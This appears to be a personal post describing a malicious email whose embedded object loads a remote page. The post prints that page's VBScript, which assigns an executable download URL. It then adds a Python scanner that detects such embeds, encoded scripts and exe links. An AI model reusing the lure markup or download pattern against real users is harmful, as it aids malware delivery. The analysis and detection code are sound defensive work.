I got this email tonight:

-----------------------------------------------------------------------------------------
From    : Lynnette Lindsey <ntfowtdbkzp@yahoo.com>
To      : Tony Perrie <tony@involution.com>
Cc      :
Attchmnt:
Subject : Re: Hello Tony
----- Message Text -----
<object data="http://www.alobhyundajacoupe.com/scr/page.php"> Hi Tony,
Great work with the photo. I agree with you, I've been trying out new photoshop techniques since I joined a month ago... It$
<br>Regards,<br> Kaye Stein
-----------------------------------------------------------------------------------------

I could just tell that this email was some type of malware waiting to be unleashed. Mostly because I have no idea WTF this person was talking about. Here's what page.php contained:

<html>
<script language=vbs>
szURL = "http://www.alobhyundajacoupe.com/scr/keyNONONO.exe"
</script>
<script language="VBScript.Encode">
</script>
</html>

Here's some interesting stuff from inside of key.exe:

This exploit seemed to not affect pine though, so I'm safe. BUT FOR HOW LONG!?
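
An added example, not part of the original post: a small Python scanner for the markers visible in the message and page above, namely a remote object embed in a mail body, a script block whose language ends in ".Encode", and an executable URL assigned inside a script. The sample mail, sample page and the lure.example host are constructed, and scanning every text/* part as HTML is an assumption.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# Constructed samples modelled on the message and page quoted above (placeholder host).
SAMPLE_MAIL = """From: sender@example.org
Subject: Re: Hello
Content-Type: text/html

<object data="http://lure.example/scr/page.php"> Hi,<br>Regards,<br>
"""
SAMPLE_PAGE = """<html><script language=vbs>szURL = "http://lure.example/scr/file.exe"</script>
<script language="VBScript.Encode">#@~^AAAA==^#~@</script></html>"""

REMOTE = re.compile(r"^(?:https?:)?//", re.I)
EXE_URL = re.compile(r"https?://[^\s\"'<>]+\.(?:exe|scr|pif)\b", re.I)

class Finder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.in_script = [], False

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        src = a.get("data") or a.get("src") or ""
        if tag in ("object", "embed", "iframe") and REMOTE.match(src):
            self.findings.append(("remote-embed", tag, src))
        if tag == "script":
            self.in_script = True
            lang = a.get("language", "").lower()
            if lang.endswith(".encode"):  # VBScript.Encode / JScript.Encode
                self.findings.append(("encoded-script", tag, lang))

    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"

    def handle_data(self, data):
        if self.in_script:  # executable download URL assigned inside a script
            self.findings += [("exe-url-in-script", "script", u) for u in EXE_URL.findall(data)]

def scan_html(html):
    parser = Finder()
    parser.feed(html)
    parser.close()
    return parser.findings

def scan_email(raw):
    found = []
    for part in message_from_string(raw).walk():
        if part.get_content_maintype() == "text":  # scan every text/* part
            found += scan_html(part.get_payload(decode=True).decode("latin-1"))
    return found
```

A mail filter would call scan_email on the raw message; scan_html is the piece to run over anything fetched from a flagged embed URL inside an isolated analysis environment.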